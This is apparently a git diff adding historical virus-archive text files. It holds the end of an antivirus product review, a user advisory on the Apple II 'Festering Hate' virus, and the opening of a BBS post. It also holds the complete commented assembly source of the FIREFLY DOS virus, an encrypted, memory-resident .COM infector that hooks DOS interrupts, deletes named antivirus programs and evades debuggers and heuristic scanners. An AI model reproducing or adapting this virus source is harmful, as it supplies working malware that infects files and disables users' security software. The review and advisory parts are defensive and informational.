control. This was a +critical point for us. For example, the Pakistani Brain is a +trivial virus to detect if you insert an infected floppy into an +uninfected system and run a detection program against it. If you +boot from an infected diskette, however, the detection process +becomes much more difficult (since the virus traps all attempts +to read the boot sector). We found only one generic product that +was able to detect the Brain while it was active. + When testing against generic COM and EXE infectors, we used +two approaches. First, we loaded the protection software onto a +clean machine and then infected it. Second, we infected a +machine with the virus, then installed the protection software, +and then allowed the virus to continue the infection process. + Throughout the review process, we considered a product to be +ineffective against a given virus if any of the following +occurred: + + - The program was unable to detect the presence of + infection activity during its normal check cycle. + - The system hung when the virus was introduced, or + during the check cycle, and no warning indication was + given by the program prior to the hang-up. (This + assumed, of course, that the virus ran normally without + the prevention product being present) + - A loss of data occurred during the checking process. + + A product was considered to be effective against a given +virus if all of the following occurred: + + - The product identified the presence of infection + activity. + - The product was able to identify each and every + infected component of the system, name each infected + program, and specify the program's directory path. + + Usability ratings were loosely handled as follows: + + 1. Global detection products that required more than two + seconds per program for a system scan (ten minutes on + our test system) scored high on our aggravation scale. + 2. Programs that required us to use new system command + structures or required us to modify the way in which we + normally interface with the operating system or our + application programs were placed in the questionable + category. + 3. Programs that required constant attention to the user's + manual in order to be useful were frowned on. + (Allowances were made for Tim Sankary's slow thought + processes). + 4. Programs that caused false alarms were given an + annoyance ratio proportional to the number of false + alarms. + 5. Programs that installed in ten minutes and remained + invisible thereafter were well liked and much + appreciated. + + Please don't mistake our lighthearted attitude to the user +friendly category. It's just that we could not come up with a +really objective measure here. No matter how hard we tried, it +usually ended up being a matter of personal opinion. Keep in +mind that we weighted the whole user interface area low in +importance. + +The Products: + We were able to identify over twenty PC products being +distributed through vendor channels and through public +domain/shareware channels. We chose five to review that we felt +were the most commonly available and most widely used. + + + +C-4 +From McAfee Associates, 4423 Cheeney St, Santa Clara, CA 95054 +408 988 3832 + +*** NOT RECOMMENDED *** + + C-4 is a classic virus filter product which is simple to +install, easy to use and creates few false alarms. It is a +memory resident program that requires about 12K of memory (not +much) and seems to run efficiently, consuming few system +resources. The instruction manual is brief, concise and to the +point. It comes with an automatic install utility, and the +installation takes about 30 seconds. From there on it's +automatic. The checking function can be easily turned on and off +through a keyboard toggle, and a simple mechanism for excluding +"safe" programs is included. A pop-up window appears whenever a +violation is reported, and the name of the violating program, and +its target, are displayed. Programs that violate C-4's filter +criteria can be frozen and prevented from continuing the suspect +activity. All in all we found this product to be well designed, +solid, easy to use and fairly unobtrusive. A solid piece of +software engineering. + So what's the problem? Well, it doesn't work. Like all +filter products, it is limited to viruses that conform to +standard operating system conventions. These conventions include +using interrupts rather than branching directly into the BIOS, +keeping the original boot sector intact, not modifying the +command interpreter, etc. As we all know, not all viruses play +by these rules. + The net result of our testing showed that C-4 was unable to +prevent or detect any of the boot sector viruses. Additionally, +if the system was infected before loading c-4, it was unable to +detect future infections from any memory resident. + We cannot recommend this program. + + + +Flu-shot+ (Shareware) +from Software Concepts Design, 594 Third Avenue, NY, NY 10016 +212 889 6438 + +*** NOT RECOMMENDED *** + + FluShot+ is a mixture of filter program and detection +program. Like C-4, it attempts to trap system interrupts and +catch viruses in the act of replication. Like C-4, it is equally +unsuccessful. The infection detection aspects of the program add +little to its ability to protect against infection, but they do +contribute substantially to the overall cumbersome and +frustrating user interface. + The complicated documentation and installation required by +FluShot+, however, was not our overriding concern. The program +simply did not work. No boot sector virus was stopped or +detected by FluShot+, and the false alarm rate was high enough to +motivate many system users to ignore a real virus infection, +whenever one could be detected. + If we add to this the numerous quirks of the program, such +as problems running with graphics software and conflicts with +certain memory resident programs, we find little positive value +in it. + We cannot recommend this program. + + +Sentry (Shareware) +From McAfee Associates, 4423 Cheeney St, Santa Clara, CA 95054 +408 988 3832 + +*** HIGHLY RECOMMENDED *** + + Every so often an easier, simpler approach really does work, +and Sentry appears to be a one-in-a-million jewel of simplicity +and effectiveness. The most invisible product that we tested, +Sentry can be installed by anyone able to type the word +"install", and thereafter nothing more is seen or heard of it +until a virus hits the system. When it does, it's certain to get +caught. Sentry was the only product able to catch every one of +our test viruses. + It does have some small faults however. First, it +increases the system boot-up time by about 10 seconds for every +100 programs in your system. For the average user this will not +be a problem (the average person uses less than 50 programs, we +are told). For some folks however, this may become burdensome. +If you are one of those rare people who use (or at least have) +2,000 programs or more, you can expect to wait over 5 minutes +extra every time you boot your system. + A second fault is that people who do a lot of programming or +software development will constantly be changing executable files +on the disk. Sentry will prod you about these changes every time +you boot. The only way to shut it up is to re-install it so that +it can take a new snapshot of the current system state. We all +found this annoying (although, to be fair, every product that we +have seen has this same annoyance). One way around it is to do +all compiles, links, etc. in a given subdirectory and instruct +Sentry to ignore all the happenings in that subdirectory. This +works quite well. If you do not frequently compile, or daily +update your software to new versions, however, then Sentry should +remain innocuous. + A final caution about Sentry. It does not work properly in +the DOS 4.0 environment and should not be used in this +environment. We understand that a new version that will correct +this problem is currently under development. + Sentry works by creating a snapshot file of all critical +system elements and comparing that snapshot file to the current +state of the system at boot time. If you power down or re-boot +your system at least once a week, then Sentry will flag any +infection long before the infection will activate and cause +damage. If you are running in a networked environment, or in any +other environment where the machine is seldom turned off or re- +booted, then Sentry can be manually invoked by typing the command +- SENTRY. + Sentry uses a unique approach to detecting a virus. It +does not checksum the entire program, but only those areas of the +program would would have to change when any virus attaches to the +program. This allows it to execute very rapidly, and thus makes +periodic scans of the entire system feasible. This separates +Sentry from all other products. The second separator, of course, +is that it is effective against all of the viruses that currently +exist. We believe that this effectiveness will continue for new +viruses. + +Virus-Pro +From International Security Technologies, 515 Madison Avenue, NY, +NY 10022 212 288 3101 + +** RECOMMENDED ** + + Virus-Pro is a product designed for large corporations, and +we include it here for those researchers studying epidemiological +data using multiple computers as a study base. + Virus-Pro is much more than a virus detector. Virus-Pro +includes sophisticated audit trails and history information that +can be used track the origin of an infection within an +organization, and to monitor the use and movement of programs +from PC to PC. It does require a fair amount of run time for the +checking process, and a dedicated Virus-Pro systems administrator +or co-ordinator is needed, but it is an excellent system level +product. + The basic function of Virus-pro is to monitor the status of +the executable programs on the logical drives and to report on +changes and exceptions. Virus-Pro stores five parameters about +each executable or hidden file in a scan file. These parameters +are: + (1) The name, extension and path + (2) The size in bytes + (3) The date-time stamp + (4) The attributes (hidden, system, and read-only). + (5) A checksum of the program + + In addition, the program stores information about the +logical drive's boot track. Virus-Pro then compares the scan +file with both a prior scan file from the same logical drive and +a baseline file which has been created using scans of individual +software distribution diskettes. Differences in or matches to +one or more of these five parameters are used to determine the +presence of infection. + Administrative software makes it easy for an organization's +Virus-Pro co-ordinator to prepare diskettes for site co- +ordinators. Each site co-ordinator has similar facilities to +make Virus-Pro diskettes for his or her PC "owners". PC owner +diskettes include a disk scanning and analysis program. Site co- +ordinators use a program called MAKEBASE to place data extracted +from vendor diskettes into baseline files which a baseline +analysis program compares with the disk scan outputs. The +analysis can spot viruses, pirated software, wrong program +versions and a host of other inconsistencies of interest to a co- +ordinator. Two system-wide administrative programs maintain +master files of site co-ordinators and PC owners, print complete +name/address/phone number lists of co-ordinators and owners, +prepare diskettes, and provide other administrative functions. + Virus-Pro is the most comprehensive system level antivirus +product that we have seen or heard of. It does however require +more maintenance than stand-alone utility antiviral products, and +it did fail to catch four of the boot sector viruses (but caught +all others). In spite of this, We feel that it provides a fair +level of protection, and excellent audit trail capabilities for +tracking virus spread. + A note of caution: This is not a product for the individual +user of a stand-alone system. It is specifically designed for +the corporate environment. + + +Disk Defender +From Director Technologies, 906 University Place, Evanston, IL +60201 312 491 2334 + +** RECOMMENDED ** + + Disk defender is an add-on board for IBM PCs and +compatibles. The product write protects the hard disk from +erasure or modification to programs or data files that do not +require frequent changes. It can therefor protect against +viruses trying to attach to system or application programs, or +even to the boot sector. It blocks their attempts and provides a +visual indication that disk writes are being attempted to a write +protected area. + A switch attached to the board write protects the entire +disk, just a portion, or none of the disk. The switch can be +set, then removed and stored in a secure place. In addition, the +board allows a portion of the hard disk to be write protected, +while allowing normal writes to other areas. + Disk defender allows the hard disk to be divided into two +active DOS partitions and allows the user to designate an area or +zone as read only or as read/write. Indicator lights on the +switch box illuminate when an attempt is made to write to a +protected partition. + The disk defender is one of the most effective antiviral +products available for protecting the hard disk.. Clearly, if a +virus cannot physically access its host program, then it cannot +infect the system. It does not, however, protect against floppy +viruses. There is no software utility included with the package +to prevent or detect floppy boot sector infectors, for example. +Thus the 5 floppy based boot viruses lived and prospered quite +happily in the system with Disk Defender installed. There are +some other drawbacks as well. Installation is non trivial and +requires a backup of all data and a re-format of the hard disk. +Then all data and programs must be restored. Disk defender also +requires that files be re-organized, and some application +programs will have to be reconfigured if they use the C drive for +temporary storage. Thus, a degree of flexibility is lost which +may be unacceptable to some people. + In spite of its limits, however, Disk Defender is a highly +reliable and secure product for protecting your hard disk. + + + + +Jim Goodwin, Lynn Marsh and Tim Sankary + +From the HomeBase Virus Research Group +408 988 4004 \ No newline at end of file diff --git a/textfiles.com/virus/fester.vir b/textfiles.com/virus/fester.vir new file mode 100644 index 00000000..f2fe51db --- /dev/null +++ b/textfiles.com/virus/fester.vir @@ -0,0 +1,182 @@ + +FESTERING HATE +Typed and Compiled by the BOWEN ARROW........ +Reformatted to AWP by Doctor Dog +Converted OUT of AWP by Jason Scott (textfiles.com) + +OK, here's what I've been able to dig up so far on the Apple II virus: + +It IS real. It appears to insert/attach itself to the file called +BASIC.SYSTEM and increases its length by 7-8 Prodos blocks. + +I found it on one of my disks as a file called BLAST.START (filetype .SYS). +This file was part of a download of a packed file called NUKE.BLAST. +Unpacked you get the BLAST.START (29 Prodos blocks long) + BLAST (an +11-block Applesoft Basic file). + +If you copy Prodos 8, Basic.System, BLAST, and BLAST.START to any disk and +then boot the disk, you'll be left at the Basic Prompt (]). If you type RUN +BLAST or "-BLAST" then the program runs fine and asks a few questions about +distance from the nuclear blast, height of the explosion, etc and tells you +the resulting effect on human life. BLAST DOES NOT NEED BLAST.START TO RUN! + +If you type "-BLAST.START" then different things happen: It searches EVERY +PRODOS volume that you have on-line including 3.5's, 5.25's, hard drives, and +RAM drives. If it finds a file on any ONE of those volumes called +BASIC.SYSTEM then it attaches itself to it. If you run it a second time then +it will attach itself to another BASIC.SYSTEM if there is one. If there +isn't one then it will attach to the BASIC.SYSTEM on its own disk (which, up +to this point has remained unchanged). If it doesn't find a BASIC.SYSTEM +then it will quite happily boot BLAST leaving you none the wiser. + +*** CRITERIA / METHOD of INFESTATION **** + +Before the VIRUS will do anything to your files the following files MUST +be on the target volume: Prodos, and Basic.System. NOTE: This is for the +initial infestation from running BLAST.START only. If, instead, the virus is +to be spread from a volume with an infected BASIC.SYSTEM then the files +required on the target volume are: Prodos, Basic.System, AND any Applesoft +Basic program. If the above conditions are NOT present then the virus will +access the volumes but change nothing. HOWEVER, if a file other than +BASIC.SYSTEM has been infected (see below for how) then there is no apparent +minimum requirement for the target volume. There doesn't seem to be any set +rule here as the virus can infect more than one file on the same disk. One +thing is for certain though...the virus only infects one file per boot +access, although sometimes it may decide not to infect any files. I have +never yet had it infect a file called PRODOS, even though PRODOS is a .SYS +filetype. BUT, I have renamed PRODOS to something else and subsequently had +it infected. + +Basically the virus checks the volume for the file called BASIC.SYSTEM...it +can be any file that you've renamed BASIC.SYSTEM, it doesn't actually have +to be THE Basic.System file...and then it attaches itself to THE FIRST +.SYS ON THE VOLUME. This is an interesting 'feature' of the virus...if +BASIC.SYSTEM is present on the disk BUT it is not the first .SYS in the +directory then the virus will NOT infect BASIC.SYSTEM but will infect +the first SYS filetype (excluding Prodos) in the directory regardless of +what its called and how long it is. Thus the virus now increases its +media for spreading. Apparently the virus does not alter the infected file +as far as functionality goes...it just takes control for a few seconds after +the program is loaded...does its dastardly deed, and then hands control back +to the program...pretty sneaky. + +***** HOW DO YOU KNOW IF YOUR FILES ARE INFECTED? ***** + +Unfortunately, there's no sure way of telling how many of your files +have been infected. If you do a lot of downloading from BBS' OR if you get a +lot of files from friends who do a lot of downloading then you're more +susceptible. There are some tell-tale signs though: + +Check all volumes (disks, hard drives & RAM) for BASIC.SYSTEM. It should +be 21 Prodos blocks in length and have a Modified Date of around JUNE 14, +1984. If so, its likely safe. If, however, it has a length of 29 Prodos +blocks then its most likely been infected...delete that file! If your system +has a clock in it (all IIgs' come with one) then an infected file will have a +Modified Date of sometime in 1988, most likely within the last two weeks. + +CAUTION: Just because you don't have any BASIC.SYSTEM that's infected doesn't +mean that you're free and clear because other .SYS files can be infected too. +These are much harder to detect because most of the time you don't know how +long an uninfected file is so you won't whether its infected or not. Those +of you who have the clock can still check the Modified Date but those of you +without one are without the means to determine for sure. + +**** SUGGESTIONS FOR WHAT TO DO **** + +If you know that a file is infected then delete it and re-copy it from a +'good' disk. If there are no other .SYS files on the disk then you are safe. +If there are other .SYS files on a disk that may have been infected then you +should format a blank disk, copy Prodos, a good Basic.System, and one of +these SYS files onto the disk. Remove ALL other disks from drives, turn off +hard drives and backup RAM drives...boot the new disk, wait for the Basic +prompt (]), and run the .SYS file ("-"). The first clue that the +.SYS file is infected is if it accesses all drives. The clincher is if, +after booting (wkether it ran or not) and cataloging, you find that your good +BASIC.SYSTEM has been modified to 29 blocks. *- CAUTION - when running all +these 'tests' be careful to mark ALL temporary disks with a big "V" and then +re-format them after your tests are over. Obviously if your BASIC.SYSTEM has +been modified then you'll have to DELETE the suspect file and get another +copy from a friend. + +If your hard drive has been infected then there's no telling how many +files have been infected. My suggestion is, based on the fact that the virus +only hits .SYS files, copy all DATA or .TXT or .DOC or .AWP or .ASP or .ADB +files from your hard drive to backup disks. Try to keep these files on +separate disks from program files. Next copy all BAS files to backups, then +copy all BIN files to backups, etc, etc until your entire hard drive is +backed up. Then you can re-format your hard drive and re-copy the uninfected +files back to the drive. Meanwhile examine the .SYS files that you backed up +and determine which ones you can replace from a new source (a friend, +etc)...and DO it. The .SYS files that remain can be tested the same way as +described above or you can elect to delete them...your choice. + +*** SAFETY *** + +It is advisable that, while this virus threat is still around, you +pre-test any new downloads that yuo get. Turn off your hard drive(s) and +printout a catalog of the program files first. Then boot the program and see +if anything changes on the disk. It'd also be a good idea to have a 'dummy' +diskette in another drive with just Prodos, a clean Basic.System and one +Basic program on it. If this gets infected then you'll know the new program +you downloaded is also infected. Please NOTE: I said that I discovered this +virus in "NUKE.BLAST"...that doesn't mean that this is the only file OR that +this is where the virus originated. + +OK, that's basically all I have discovered so far. I was lucky that I +located my infected file early AND that I had saved it on a file disk that +ad no .SYS files on it. I hope everyone else who reads this is as lucky!! + +One final note - I, as yet, have not found out exactly what happens +to trigger the virus to trash the contents of a volume - I only know that +several people have had their hard drives comletely trashed. It appears that +the virus remains dormant and is triggered either by a count of boots or by a +date or ??? It appears that when it does its thing then it gives you a +message about it and who's responsible. I will not lower myself to comment +on the quality of individual who would dream up a stunt like this. + + As soon as I get more info I will be passing it on. Meanwhile if +anyone has anything to add OR if you discover other infected files then +please share the info. To date, the files that I have heard of that are +nfected are as follows: NUKE.BLAST, ZLINK, SQUIRT v1.5, and Mr. FIXIT v 3.7 + +LATEST UPDATE---- + +The VIRUS is called FESTERING HATE and when it goes of there is a +Mpicture of a diskette being pricked by a needle. It says that it is written +by the K/RAD ALLIANCE and, apparently it has been known, on very rare +occassions, to infect a file more than once. This last part has not been +substantiated. + +Oh, some guy who had his HD trashed managed to use his FINGERPRINT card to +capture the title page of the virus: + + [WOP] -666- FESTERING HATE -666- [FOG] + ======================================== + W| The Good News: You now have a copy |F + o| of one of the greatest programs |r + r| that has ever been created! |i + s| The Bad News: Its quite likely |e + h| that its the only program you now |n + i| have in your possession. |d + p|====================================|s + p| Hey Glen! We sincerely hope our | + e| royalty checks are in the mail! |o + r| Seeing how we're making you rich |f + s| by providing a market for virus | + | detection software! |G + o|====================================|l + f|Elect LORD DIGITAL as GOD committee!|e + |====================================|n + P| )/> The Kool/Rad Alliance! <\( | + a| Rancid Grapefruit -- Cereal Killer |B + t|====================================|r + r| This program is made possible by a |e + i| grant from Pig's Knuckle ELITE |d + c| Research. Orderline: 313/534-1466 |o + k======[(C) 1988 ELECTRONIC ARTS]======N + + ...more later.... + +Courtesy of Bowen Arrow + + >>>---Arrow---> diff --git a/textfiles.com/virus/firefly.txt b/textfiles.com/virus/firefly.txt new file mode 100644 index 00000000..7ba5183e --- /dev/null +++ b/textfiles.com/virus/firefly.txt @@ -0,0 +1,516 @@ +;FIREFLY virus, by Nikademus. +; +;Firefly is an encrypted, memory resident virus which infects +;.COMfiles on load. It incorporates code from Proto-T, +;LokJaw and YB-X viruses and, when in memory, attacks a large selection +;of anti-virus programs as they are executed. Anti-virus programs +;identified by Firefly's execute/load handler are deleted. +;Firefly incorporates simple code from previous issues of the newsletter +;designed to de-install generic VSAFE resident virus activity +;filters designed for Microsoft by Central Point Software. It +;contains instructions - specifically a segment of pseudo-nested +;loops - which spoof F-Protect's expert system generic virus +;identification feature. +; +;FIREFLY also includes a visual marker tied to the system timer +;tick interrupt (1Ch) which slowly cycles the NumLock, CapsLock +;and ScrollLock LEDs on the keyboard. This produces a noticeable +;twinkling effect when the virus is active on a machine. +; +;Anti-anti-virus measures used by Firefly vary in effectiveness +;dependent upon how a user employs software. For example, while +;Firefly is designed to delete the Victor Charlie anti-virus +;shell, VC.EXE, a user who employs the software packages utilities +;for generic virus detection singly, will not be interfered with +;by the virus. Your results may vary, but the virus does effectively +;delete anti-virus programs while in memory unless steps are taken +;beforehand to avoid this. +; +;Firefly incorporates minor code armoring techniques designed to thwart +;trivial debugging. + + + + .radix 16 + code segment + model small + assume cs:code, ds:code, es:code + + org 100h + +len equ offset last - start +vir_len equ len / 16d ; 16 bytes per paragraph +encryptlength equ (last - begin)/4+1 + + + +start: + mov bx, offset begin ; The Encryption Head + mov cx, encryptlength ; +encryption_loop: ; + db 81h ; XOR WORD PTR [BX], ????h + db 37h ; +encryption_value_1: ; + dw 0000h ; + ; + db 81h ; XOR WORD PTR [BX+2], ????h + db 77h ; + db 02h ; 2 different random words +encryption_value_2: ; give 32-bit encryption + dw 0000h ; + add bx, 4 ; + loop encryption_loop ; +begin: + jmp virus + db '[Firefly] By Nikademus $' + db 'Greetings to Urnst Kouch and the CRYPT staff. $' +virus: + call bp_fixup ; bp fixup to determine +bp_fixup: ; locations of data + pop bp ; with respect to the new + sub bp, offset bp_fixup ; host + +Is_I_runnin: + call screw_fprot ; screwing + call screw_fprot ; heuristic scanning + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + push ds + push es + mov ax,2C2Ch ; + int 21h ; call to see if runnin + cmp ax, 0FFFh ; am i resident? + jne cut_hole ; +fix_victim: + pop es ; replace victims 3 bytes + pop ds ; + mov di,050h ; stops one of SCAN's + add di,0B0h ; generic scan attempts + lea si, ds:[vict_head + bp] ; (scan only worked on + mov cx, 03h ; unencrypted copies + rep movsb ; regardless) +Bye_Bye: + mov bx, 100h ; jump to 100h + jmp bx ; (start of victim) +cut_hole: + mov dx, 5945h ; pull CPAV (MSAV) + mov ax, 64001d ; out of memory + int 16h ; (This also screws with + ; TBCLEAN ???????) + + call screw_fprot ; more screwing of + call screw_fprot ; heuristic scanning + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + call screw_fprot ; + + mov bx,cs ; reduce memory size + dec bx ; + mov ds,bx ; + cmp byte ptr ds:[0000],5a ; + jne fix_victim ; + mov bx,ds:[0003] ; + sub bx, 100h ; # of 16byte paragraphs + mov ds:0003,bx ; to grab (4k) +Zopy_me: + xchg bx, ax ; copy self to the new + mov bx, es ; 'unused' part of memory + add bx, ax ; + mov es, bx ; + mov cx,len ; + mov ax,ds ; + inc ax ; + mov ds,ax ; + lea si,ds:[offset start+bp] ; + lea di,es:0100 ; + rep movsb ; + +Hookroutines: ; interrupt manipulation (Happy!, Happy!) + xor ax, ax ; (Joy!, Joy!) + mov ds, ax + push ds ; push 0000h + lds ax, ds:[1Ch*4] + mov word ptr es:old_1Ch, ax ; save 1C + mov word ptr es:old_1Ch+2, ds + pop ds + push ds + lds ax, ds:[21h*4] ; get int 21h + mov word ptr es:old_21h, ax ; save 21 + mov word ptr es:old_21h+2, ds + mov bx, ds ; bx = ds + pop ds + mov word ptr ds:[1h*4], ax ; put int 21h into 1 and 3 + mov word ptr ds:[1h*4+2], bx ; this should screw + mov word ptr ds:[3h*4], ax ; most debuggers + mov word ptr ds:[3h*4+2], bx + mov word ptr ds:[21h*4], offset Firefly ; put self in 21 + mov ds:[21h*4+2], es ; + mov ds:[1Ch*4+2], es + mov word ptr ds:[1Ch*4], offset Lights ; hook 1C + jmp fix_victim +Lights: ; keyboard lights changer... + ; found in NIKTRKS1.ZIP + push ax ; save these + push bx ; + push cx ; + push dx ; + push si ; + push di ; + push ds ; + push es ; + + push cs + pop ds + push cs + pop es + cmp [click], 63d ; after 63 clicks + je one + cmp [click], 126d ; after 126 clicks + je two + cmp [click], 189d ; after 189 clicks + je three + cmp [click], 0ffh ; have we counted to 255? + je clear + inc [click] ; increase click count + jmp endme +clear: mov [click], 00h ; clear click count + mov ax, 40h + mov ds, ax + mov bx, 17h ; ds:bx = location o' flags + and byte ptr [bx],0 ; clear keyboard flag(s) + jmp endme +one: inc [click] + mov ax, 40h + mov ds, ax + mov bx, 17h + mov byte ptr [bx],20h ; set numlock flag + jmp endme +two: inc [click] + mov ax, 40h + mov ds, ax + mov bx, 17h + mov byte ptr [bx],40h ; set caps lock flag + jmp endme +three: inc [click] + mov ax, 40h + mov ds, ax + mov bx, 17h + mov byte ptr [bx],10h ; set scroll lock flag +endme: + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + jmp dword ptr cs:[old_1Ch] ; Go to old int 1Ch + db 'Psalm 69' +screw_fprot: + jmp $ + 2 ; Nested calls to confuse + call screw2 ; f-protect's heuristic + call screw2 ; analysis + call screw2 ; + call screw2 ; + call screw2 ; + ret ; +screw2: ; + jmp $ + 2 ; + call screw3 ; + call screw3 ; + call screw3 ; + call screw3 ; + call screw3 ; + ret ; +screw3: ; + jmp $ + 2 ; + call screw4 ; + call screw4 ; + call screw4 ; + call screw4 ; + call screw4 ; + ret ; +screw4: ; + jmp $ + 2 ; + ret ; + db 'Every day is Halloween' +Firefly: + pushf ; Am I checking if + cmp ax,2c2ch ; I am resident? + jne My_21h ; + mov ax,0FFFh ; If so, return + popf ; 0FFFh in AX + iret ; + +My_21h: + push ax ; save these + push bx ; + push cx ; + push dx ; + push si ; + push di ; + push ds ; + push es ; +check_for_proper_calls: + cmp ah, 4Bh ; executed? + je chk_com + cmp ah, 3Dh ; open? + je chk_com + cmp ah, 43h ; attribs? + je chk_com + cmp ah, 6Ch ; extended open? + je extended + +notforme: + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + popf + jmp dword ptr cs:[old_21h] ; The End + db 'Happiness in Slavery' +extended: + mov dx, si ; now a normal open +chk_com: + mov word ptr cs:victim_name,dx + mov word ptr cs:victim_name+2,ds + cld + mov di,dx + push ds + pop es + mov al,'.' ; find the period + repne scasb ; + call avtest + cmp ax, 00ffh ; WAS the program an AV? + je notforme + cmp word ptr es:[di],'OC' ; is i a .(CO)M? + jne notforme +Grab_24: ; hook interrupt 24 + push ds ; by direct writes to + push dx ; interrupt vector + xor ax, ax ; table + mov ds, ax ; + mov dx, offset new_24h ; + mov word ptr ds:[24h*4], dx ; + mov word ptr ds:[24h*4+2], es ; + pop dx + pop ds + +open_victim: + push cs + pop es + lds dx, cs:victim_name ; get and save attributes + mov ax, 4300h ; + int 3h ; + jc notforme ; error handler + push cx ; + push ds ; + push dx + mov ax, 4301h ; clear attribs + xor cx, cx ; + int 1h ; + jc notforme + mov ax,3D02h ; open victim + lds dx, cs:victim_name ; + int 3h ; + jc notforme ; error handler + push cs ; + pop ds ; + xchg ax, bx ; put handle in proper place +get_date: ; get and save date + ; and time + mov ax,5700h + int 3h + push cx ; save time + push dx ; save date + +check_forme: + mov ah,3fh ; read 1st 3 bytes + mov cx,03h ; + mov dx,offset vict_head ; + int 1h + + mov ax, 4202h ; point to end + xor cx, cx ; + xor dx, dx ; + int 3h ; + + mov cx, word ptr [vict_head+1] ; possible jump location + add cx, last-start+3 ; + cmp ax, cx ; already infected? + jz save_date ; + push ax +get_random: + mov ah, 2Ch ; dx and (cx-dx) + int 3h ; will be to two + or dx, dx ; encryption values + jz get_random ; +write_virus: + mov word ptr [offset encryption_value_1], dx + mov word ptr [offset e_value_1], dx + sub cx, dx + mov word ptr [offset encryption_value_2], cx + mov word ptr [offset e_value_2], cx + pop ax + mov si, ax ; fix BX offset in head + add si, ((offset begin-offset start)+100h) + mov word ptr [offset start+1], si + + mov si, offset start ; copy virus to buffer + mov di, offset encryptbuffer ; + mov cx, last-start ; + rep movsb ; + + sub ax, 03h ; construct jump + mov word ptr [offset new_jump+1], ax ; + mov dl, 0E9h ; + mov byte ptr [offset new_jump], dl ; +Encryptvirus_in_buffer: + push bx ; encrypt copy + mov bx, offset ((begin-start)+encryptbuffer) ; in encrypt- + mov cx, encryptlength ; buffer +e_loop: ; + db 81h ; XOR [bx] + db 37h ; +e_value_1: ; + dw 0000h ; scrambler #1 + db 81h ; XOR [bx+2] + db 77h ; + db 02h ; +e_value_2: ; + dw 0000h ; scrambler #2 + add bx, 4 ; + loop e_loop ; loop + + pop bx + mov ah, 40h ; write virus + mov cx, last-start ; + mov dx, offset encryptbuffer ; + int 1h ; + + mov ax, 4200h ; point to front + xor cx, cx ; + xor dx, dx ; + int 1h ; + + mov ah, 40h ; write jump + mov dx, offset new_jump ; + mov cx, 03h ; + int 3h ; +save_date: + pop dx ; Date + pop cx ; Time + mov ax,5701h ; + int 1h + ; +close_file: ; + mov ah,03Eh ; Close file and restore + int 3h ; attribs + mov ax, 4301h ; + pop dx ; + pop ds ; This is the end... + pop cx ; My only friend, The End. + int 3h ; - Jim Morrison + jmp notforme ; +new_24h: + mov al,3 ; Critical Error (Mis)handler + iret ; + db 'The land of Rape and Honey' + + ; This area is the "intelligence" of Firefly + ; It looks for known AV names which it then deletes. + ; So it sort of shuts down the computers "immune system" +avtest: + cmp word ptr es:[di-3],'MI' ;Integrity Master + je AV ;*IM + + cmp word ptr es:[di-3],'XR' ;*rx + je AV ; + + cmp word ptr es:[di-3],'PO' ;*STOP + jne next1 ;(VIRSTOP) + cmp word ptr es:[di-5],'TS' ; + je AV ; + +next1: cmp word ptr es:[di-3],'VA' ;*AV i.e. cpav + je AV_Detected ;(TBAV) (MSAV) + + cmp word ptr es:[di-3],'TO' ;*prot f-prot + jne next2 ; + cmp word ptr es:[di-5],'RP' ; + jne next2 ; +AV: jmp AV_Detected ; must be equal + +next2: cmp word ptr es:[di-3],'NA' ;*scan McAffee's + jne next3 ;(TBSCAN) + cmp word ptr es:[di-5],'CS' ; + je AV_Detected ; + + cmp word ptr es:[di-3],'NA' ;*lean CLEAN.. + jne next3 ; why not eh? + cmp word ptr es:[di-5],'EL' ;(TBCLEAN) + je AV_Detected ; + +next3: cmp word ptr es:[di-3],'CV' ; Victor Charlie + je AV_Detected ; default *VC + + cmp word ptr es:[di-3],'KC' ; VCHECK + jne next4 ; (Victor Charlie) + cmp word ptr es:[di-5],'EH' ; (TBCHECK) *HECK + je AV_Detected ; +next4: + cmp word ptr es:[di-3],'ME' ; TBMEM + jne next5 ; *BMEM + cmp word ptr es:[di-5],'MB' ; + je AV_Detected ; +next5: + cmp word ptr es:[di-3],'XN' ; TBSCANX + jne next6 ; *CANX + cmp word ptr es:[di-5],'AC' ; + je AV_Detected ; +next6: + cmp word ptr es:[di-3],'EL' ; TBFILE + jne next7 ; *FILE + cmp word ptr es:[di-5],'IF' ; + je AV_Detected ; +next7: + ret +AV_Detected: + mov ds, word ptr cs:[victim_name + 2] ; The Victim + mov dx, word ptr cs:[victim_name] + mov ax, 4301h ; Clear it's attribs + mov cx, 00h ; + int 1h + mov ah, 41h ; Delete It. + int 3h ; + ret ; + db 'Its Dead Jim' + +vict_head db 090h, 0cdh, 020h ; 3 bytes of storage +old_21h dw 00h,00h ; int 21 storage +old_1Ch dw 00h,00h +click db 00h +last: + +; The heap........ junk not needed in main program + +victim_name dd ? +new_jump db 090h, 090h, 090h +encryptbuffer db (last-start)+1 dup (?) +code ends + end start + + + diff --git a/textfiles.com/virus/fish.vir b/textfiles.com/virus/fish.vir new file mode 100644 index 00000000..f5d979a0 --- /dev/null +++ b/textfiles.com/virus/fish.vir @@ -0,0 +1,171 @@ + This was originally posted in the International Virus Echo, but +some parties here may find of interest. + +Date: 06-30-90 (03:11) Number: 1344 The DATAMAX BBS + To: ALL Refer#: NONE +From: MARK TAYLOR Read: YES +Subj: REPOSTED MESSAGE Conf: (39) fVIRUS +------------------------------------------------------------------------ +(This message was originally addressed to "Merry Hughes", an alias +used by the sysop of the Excalibur BBS. The author, Frank Breault, +tried to post it there on June 28. Since he is not a caller of this +BBS, he asked me to repost it for him here because it contains +important information which everyone should be made aware of. Frank +is offering to substantiate his statements in writing in a docu- +mented, scientific way, and to provide samples, copies of work logs, +decrypted virus images and transcripts of debugger sessions to +anyone who is *NOT CONNECTED* in any way with the so-called +"researchers" of the McAfee company. A sworn, notarized affidavit +to that effect will be required prior to release of code data or +samples. Leave me a message if you are interested and I'll try to +make arrangements. I make no claim of any knowledge of these +matters but think that people should be allowed to express the +results of their work, especially when they are trying to warn the +public about a serious possible danger in a selfless, noncommercial +manner). ------Message starts: + +"Well, Merry, most of those who have looked at this unusual virus +still don't know everything about it. Even after being fully +decrypted, the code remains hard to disassemble. But I am certain +that it doesn't contain any reboot routine and I am *quite certain* +that it does not occupy variable memory size. I have some idea of +how you came to believe that it uses variable memory allocation but, +not knowing exactly what you saw, I can't explain your belief. I +think 